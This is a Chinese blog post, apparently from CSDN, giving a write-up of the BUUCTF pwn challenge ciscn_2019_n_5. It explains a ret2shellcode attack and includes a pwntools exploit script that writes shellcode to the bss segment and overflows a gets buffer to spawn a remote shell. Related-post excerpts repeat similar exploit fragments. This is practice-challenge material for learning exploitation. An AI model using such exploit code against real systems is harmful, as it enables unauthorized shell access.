【BUUCTF】ciscn_2019_n_5 Write Up

最新推荐文章于 2025-02-20 15:16:49 发布
最新推荐文章于 2025-02-20 15:16:49 发布
阅读量552 收藏
点赞数
分类专栏: BUUCTF - PWN 文章标签: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/tqydyqt/article/details/107844425
版权


这个反编译有点不准确,不过大概意思能理解到,先读入0x64字符到bss段上,然后用gets函数读入到栈上

什么保护都没开,我们发现可以直接执行bss段上的代码

思路很简单,将shellcode写入bss段,然后栈溢出rop到bss段上执行shellcode,拿到shell

注意栈帧大小

from pwn import *
from LibcSearcher import *
from struct import pack

context.os='linux'
context.arch='amd64'
context.log_level='debug'

sd=lambda x:io.send(x)
sl=lambda x:io.sendline(x)
ru=lambda x:io.recvuntil(x)
rl=lambda :io.recvline()
ra=lambda :io.recv()
rn=lambda x:io.recv(x)
sla=lambda x,y:io.sendlineafter(x,y)

io=remote('node3.buuoj.cn',25188)
#io=process('./ciscn_2019_n_5')
elf=ELF('./ciscn_2019_n_5')

ra()
sl(asm(shellcraft.sh()))
ra()
sl('a'*40+p64(0x601080))

io.interactive()
buuctf ciscn_2019_n_5 ret2shellcode解题思路
weixin_45441024的博客
12-02 513
BUUCTF ciscn_2019_n_5 ret2shellcode check一下,最喜欢的一片红色,64位的程序 发现存在两次输入,那么我们就通过read将构造的shellcode写在栈上,然后在第二次的时候通过构造溢出覆盖返回地址跳转到我们写入shellcode的这个地方,然后就开始构造吧: from pwn import * p=remote('node3.buuoj.cn',25157) sh="\x48\x31\xff\x48\x31\xc0\xb0\x69\x0f\x05\x48\x31
ciscn_2019_n_5
qq_39869547的博客
01-11 1069
very easy # -*- coding:utf-8 -*- from PwnContext.core import * local = 1 if local == 1 : p = remote('node3.buuoj.cn','25056') else: ctx.binary = binary ctx.remote_libc = debug_libc ctx...
BUUCTF 刷题 ciscn_2019_n_5
Helloity的博客
02-09 3288
先附上题目:BUUCTF在线评测 放到我们的虚拟机上checksec一下,64位程序,拥有RWX段。 Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x400000) RWX: Has RWX segments 接下来放到IDA里f5一下,可以看到主函数读
buuctf_ciscn_2019_n_5
2301_81060697的博客
02-20 287
buuctf
BUUCTF ciscn_2019_n_5
2401_88087539的博客
01-14 358
pwn新手小白,写完题后整理的一点点思路,有借鉴其他wp,有任何问题各位师傅可以提出,接收批评指正
Buuctf(pwn) ciscn_2019_n_5
半岛铁盒的博客
03-30 400
发现name在全局变量bss段上 可以利用 gets() 进行溢出 from pwn import* r=remote('node3.buuoj.cn',27785) context(arch='amd64',os='linux') 说明版本架构 shellcode=asm(shellcraft.sh()) 获取生成调用 bin/sh的 shellcode r.sendlineafter('tell me your name',shellcode) 往name里面写入shellcod...
[CISCN 2021] 部分 write up
Anton__1的博客
05-16 1125
easy_source 抓包扫目录干都干了,发现什么都拿不到 预期猜测flag在注释里(也给了提示): 你能发现我嘛 所以我们可以试着用PHP内置类中的ReflectionMetho来读取类中函数的注释: 参考自https://r0yanx.com/2020/10/28/fslh-writeup/ payload如下: ?rc=ReflectionMethod&ra=User&rb=a&rd=getDocComment 因为不知道到底在那个函数中,随即手工爆破直到拿到flag
BUUCTF-PWN刷题记录25(IO file attack)
weixin_44145820的博客
08-14 1720
背景知识 在做关于IO FILE的攻击的时候,对其中涉及的数据结构的了解必不可少,以下是几个关键的数据结构 FILE 结构 定义在 libio.h 中,如下 struct _IO_FILE { int _flags; /* High-order word is _IO_MAGIC; rest is flags. */ #define _IO_file_flags _flags /* The following pointers correspond to the C++ strea
CTF题解NO.00004】BUUCTF/BUUOJ - Pwn write up by arttnb3
arttnba3的博客
11-20 1483
GITHUB BLOG LINK THERE 文章目录[GITHUB BLOG LINK THERE](https://archive.next.arttnba3.cn/2020/09/08/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x04%E3%80%91BUUOJ-Pwn-write-up-by-arttnb3/)0x000.绪论0x001.test your nc - nc0x002.rip - ret2text0x003.warmup_csaw_2016 - ret2text0
2021-08-30 BUUCTF刷题记录PWN
m0_56897090的博客
08-30 629
2021-08-30 BUUCTF刷题记录 刷题数量:13 题目分类:栈溢出、堆、pwn基础 文章目录2021-08-30 BUUCTF刷题记录[Black Watch 入群题]PWN0x00 题目描述0x01 分析思路0x02 EXPez_pz_hackover_20160x00 题目描述0x01 题目分析0x02 思路0x03 EXPjarvisoj_tell_me_something0x00 题目描述0x01 题目分析0x02 EXPJarvisoj_level30x00 题目描述0x01 题目思路0
BUUCTF-PWN刷题日记(一)
weixin_45461609的博客
04-30 1551
BUUCTF-PWN刷题日记rip rip 简单的栈溢出 #coding=utf-8 from pwn import* #r = process('./pwn1') r = remote('node3.buuoj.cn',26123) sys_addr = 0x401186 #address of fun payload = 'a'*(0xf+8) + p64(sys_addr) r.sendli...
[BUUCTF-pwn]——ciscn_2019_n_5
Y_peak的博客
02-11 772
[BUUCTF-pwn]——ciscn_2019_n_5 题目地址: https://buuoj.cn/challenges#ciscn_2019_n_5 老规矩还是先checksec 一下看看,64位的什么保护都没开.感觉应该要自己写shellcode了 在IDA中一看,果然如此.将准备好的shellcode 通过read写入 name . 然后通过gets进行栈溢出,使其,返回至name所在位置即可. shellcraft是pwntools中的一个模块是shellcode的生成器 所以shell
[buuctf]ciscn_2019_n_5
逆向萌新的博客
07-03 1031
[buuctf]ciscn_2019_n_5
BUU-ciscn_2019_n_5
qq_45771413的博客
04-27 792
查看保护 什么都没保护.jpg IDA 逻辑很简单,两次输入。这两次输入看起来都可以利用: read限制了读取长度,而且name是全局变量,地址可访问。 gets里的text可以进行栈溢出,0x20 解题思路 EXP from pwn import * p=remote('node3.buuoj.cn',29048) context.arch = 'amd64' # 架构名称,不加狂报错…… context.log_level = 'debug' # debug模式 shellcode = asm(s
buuctf ciscn_2019_n_5 (ret2shellcode)
carol2358的博客
04-21 1079
无保护,程序直接提供了写入bss,ret2shellcode 一共两次输入,第一次写sh到bss,第二次溢出text然后跳转到bss exp: from pwn import * from LibcSearcher import * local_file = './ciscn_2019_n_5' local_libc = '/usr/lib/x86_64-linux-gnu/libc-...
[BUUCTF]PWN20——ciscn_2019_n_5
mcmuyanga的博客
09-07 1846
[BUUCTF]PWN20——ciscn_2019_n_5 附件 步骤: 例行检查,64位,没有开启任何保护 试运行一下程序,看看程序的执行情况 64位ida载入,找到main函数, 逻辑很简单,第一次让我们输入名字,限制输入长度为0x64,看一下name参数,发现name在全局变量bss段上 第二次输入利用gets,没有限制长度,可以对v4造成溢出 利用过程 利用第一个输入点,往name参数里写入shellcode context(arch='amd64',os='linux')
ciscn_2019_ne_5BUUCTF
qq_41696518的博客
08-31 647
ciscn_2019_ne_5 BUUCTF
ciscn_2019_n_8
最新发布
03-24
### 关于CISCN 2019 N8题目的解析 在全国大学生信息安全竞赛(CISCN)中,Web方向的题目通常涉及漏洞利用、文件包含、反序列化攻击等内容。对于CISCN 2019中的N8题目,其核心考点可能围绕PHP反序列化漏洞展开。 ##...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值